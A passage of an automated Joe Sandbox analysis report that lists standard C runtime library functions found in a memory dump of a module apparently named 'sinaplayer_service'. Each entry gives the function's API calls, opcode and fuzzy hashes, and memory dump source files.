                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DACED
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DACF8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1358483507-0
                                                                                                                                                                                                    • Opcode ID: d75924287074b91bfb2de3ac95ab8d5988e25bd664ae031ef214ada12a3971ce
                                                                                                                                                                                                    • Instruction ID: a5f1b9dcb923dfc816cb632e487d4b281846c7f772f64db61126ef2e5156c141
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d75924287074b91bfb2de3ac95ab8d5988e25bd664ae031ef214ada12a3971ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD115776A442269BFB610E989800BBE32D5FB16B22FF48107F9554F1D4DA718C8093A1
                                                                                                                                                                                                    Function 6D124519 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR120(000000FF), ref: 6D124536
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,0000004C), ref: 6D12454E
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6D1245FD
                                                                                                                                                                                                    • __crtUnhandledException.MSVCR120(?), ref: 6D12460C
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR120(000000FF), ref: 6D124623
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _crt_debugger_hook$DebuggerExceptionPresentUnhandled__crtmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2836902185-0
                                                                                                                                                                                                    • Opcode ID: 7ddb71bc2774611acd8d6d14493924e307aaa8f2c2c6bc7fc261b1bf9a34f67e
                                                                                                                                                                                                    • Instruction ID: 9797337e64ace18bf86f7a162a18cacfb5e919cb69c9cff4d1ee835cbe1d3677
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ddb71bc2774611acd8d6d14493924e307aaa8f2c2c6bc7fc261b1bf9a34f67e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631D37590122D9BCF21DF24D8887D9BBF8AF18310F5042EAE81CA7250EB749BC58F44
                                                                                                                                                                                                    Function 6D109AC7 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__mbsrtowcs_helper_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2140840981-0
                                                                                                                                                                                                    • Opcode ID: 1bce2497fcfcb09d2059b597ac2393f79fd620e060f83240e75c937c886f4091
                                                                                                                                                                                                    • Instruction ID: f9af5c59ea523392eb072be821804b96c4f27fd594aed786ba55656f81a7c238
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bce2497fcfcb09d2059b597ac2393f79fd620e060f83240e75c937c886f4091
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4511C83265861397D712BF6C88B0F6B72A5EF65770F1A4515ED648B298DFF0C4408391
                                                                                                                                                                                                    Function 6D0F89F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F89FA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6D0F8A0C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6D15D0DC,00000014), ref: 6D0F8A21
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                      • Part of subcall function 6D0F887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6D0F8AB2,?,?,?,00000014), ref: 6D0F8895
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                      • Part of subcall function 6D0E9E5E: Concurrency::location::operator==.LIBCMT ref: 6D0E9E8E
                                                                                                                                                                                                      • Part of subcall function 6D0E9E5E: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0E9EDA
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6D0F8A5A
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6D0F8A94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency::location::operator==Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3358135389-0
                                                                                                                                                                                                    • Opcode ID: 3cce2e5c3ce3f5b6ae2979d73a617cfdafcac306bfabe8b9cdb7d04c45471ecb
                                                                                                                                                                                                    • Instruction ID: 31a89362c0908444b25d9b51acfa287597aab98d4d18b89bd0a29c493891e353
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cce2e5c3ce3f5b6ae2979d73a617cfdafcac306bfabe8b9cdb7d04c45471ecb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84219FB2908605AFEB01DFB6C4807EDB7B2FF88314B62852DDA59AB300DB759512DB50
                                                                                                                                                                                                    Function 6D0F8AE6 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F8AED
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6D0F8AFF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6D15D0DC,00000014), ref: 6D0F8B14
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                      • Part of subcall function 6D0F887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6D0F8AB2,?,?,?,00000014), ref: 6D0F8895
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                      • Part of subcall function 6D0E9FA4: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0E9FB2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6D0F8B4D
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6D0F8B84
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3410968691-0
                                                                                                                                                                                                    • Opcode ID: 8b80f2d275c91863f71a48021a65179b4d66e40a35209d9a134afe5f143dc60c
                                                                                                                                                                                                    • Instruction ID: c8557e7cec97d5368fff920a137556409ad2eeb6f0af966d32c1d21073aae8c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b80f2d275c91863f71a48021a65179b4d66e40a35209d9a134afe5f143dc60c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0321AEF19086059FEB00DFB6C4907ADF7F1BF88204B61892DDA5AAB340DB749402CB91
                                                                                                                                                                                                    Function 6D10A49D Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__wcsrtombs_helper_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1232677100-0
                                                                                                                                                                                                    • Opcode ID: 7077da380754c1ad6578630a45be5d76f80f97c30f2ceafb05829f971d4b7d84
                                                                                                                                                                                                    • Instruction ID: bf1c786fb0676df2780eb0697664f14d1a570c7a23db5e10d294b1be305f5949
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7077da380754c1ad6578630a45be5d76f80f97c30f2ceafb05829f971d4b7d84
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9110D366486174BD713BE589444F9A77A4FF62320F160104FE64DB289DFF1C80083A2
                                                                                                                                                                                                    Function 6D0A3DE8 Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?), ref: 6D0A3E2B
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6D0D3099
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                    • Opcode ID: 7d0fd8d4106bf84551202aeacdd079b2a5de46ee33a00e2cd7b41c91276c0ba0
                                                                                                                                                                                                    • Instruction ID: b3e48123afe1cef45b63180d7f8484dcb8a230be29b314e4315b395a93e6dd45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0fd8d4106bf84551202aeacdd079b2a5de46ee33a00e2cd7b41c91276c0ba0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8311D3706082059FEB259FA5DC0877EBBB8EF89344B09012AEA5587251EBB4D914CB91
                                                                                                                                                                                                    Function 6D0E99E7 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0E99EE
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A15
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000080,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A31
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A60
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000080,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A7F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2611423129-0
                                                                                                                                                                                                    • Opcode ID: 00ef714812d5ec05e9d09e8c474ffe811e6452553d313048c9722056df24cf81
                                                                                                                                                                                                    • Instruction ID: 57a4bb1377f95ddb27dcb187bc8949b9f23277f931a42621fd7faa44e95a23e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00ef714812d5ec05e9d09e8c474ffe811e6452553d313048c9722056df24cf81
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98218E71B082118FEB10CFA8D5407ADB7E0BF48754F1A855DE9A8AF285DBB0D9408BD0
                                                                                                                                                                                                    Function 6D0B287F Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2556715357-0
                                                                                                                                                                                                    • Opcode ID: 6dd9bdb3e969f4905efe92189e4b4e57e184ed0636cdd7fe9a512ea8783e915c
                                                                                                                                                                                                    • Instruction ID: 9cb5d854253bb7dadd627e211420e25b0b09b43983819cb30eb9672dbbf8f564
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dd9bdb3e969f4905efe92189e4b4e57e184ed0636cdd7fe9a512ea8783e915c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C011C43194A70AEBFB259F689910BDEB7ECEF0E310F82406BE6049B140D7B585409795
                                                                                                                                                                                                    Function 6D0AC1BA Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0B2280
                                                                                                                                                                                                    • _local_unwind4.MSVCR120(6D15F7B8,?,000000FE,6D0AC248,0000000C), ref: 6D0B2296
                                                                                                                                                                                                      • Part of subcall function 6D0AC264: _wsopen_s.MSVCR120(?,?,00000000,?,00000180,?,00000000,?,?,?,?,6D0AC22A,?,?,?,00000000), ref: 6D0AC32B
                                                                                                                                                                                                      • Part of subcall function 6D0AC1B2: _unlock_file.MSVCR120(00000000,6D0AC23E), ref: 6D0AC1B3
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0B22A5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AC248,0000000C), ref: 6D0D5F0B
                                                                                                                                                                                                      • Part of subcall function 6D095857: _lock.MSVCR120(00000001,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09586C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0D5F15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_local_unwind4_lock_unlock_file_wsopen_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 494836370-0
                                                                                                                                                                                                    • Opcode ID: ea30115e4276144767c7a3dab4e50998e706673c0200ce7fa13f282b0c1142bc
                                                                                                                                                                                                    • Instruction ID: 5f6d6638265ebb21a9bc668239c5f673f8c03409838bf3bfb3bfeba476a8d7d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea30115e4276144767c7a3dab4e50998e706673c0200ce7fa13f282b0c1142bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF11A375A18307EBFB519FB88C0077F36E4AF46350F4A8525A924DB281EB35C9419B61
                                                                                                                                                                                                    Function 6D0A0477 Relevance: 7.6, APIs: 5, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                    • _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                    • __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                    • __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00001000,?,0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A05B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$_fileno_isatty_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1391627188-0
                                                                                                                                                                                                    • Opcode ID: 55cb5f08f6262aaebfb59f170c1064cc43aa213e38374b7f37843dc23d0b9f26
                                                                                                                                                                                                    • Instruction ID: b24a1a4a163bf416c972d6d804c84db0c666b51575862b46c843879bfe36c6a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55cb5f08f6262aaebfb59f170c1064cc43aa213e38374b7f37843dc23d0b9f26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96118FB280C7179AF7248EBBE84076777E4BB0A394B55942ED6A9C6641E770E0808B50
                                                                                                                                                                                                    Function 6D0EC7F5 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?), ref: 6D0EC812
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0EC82A
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0EC864
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?), ref: 6D0EC879
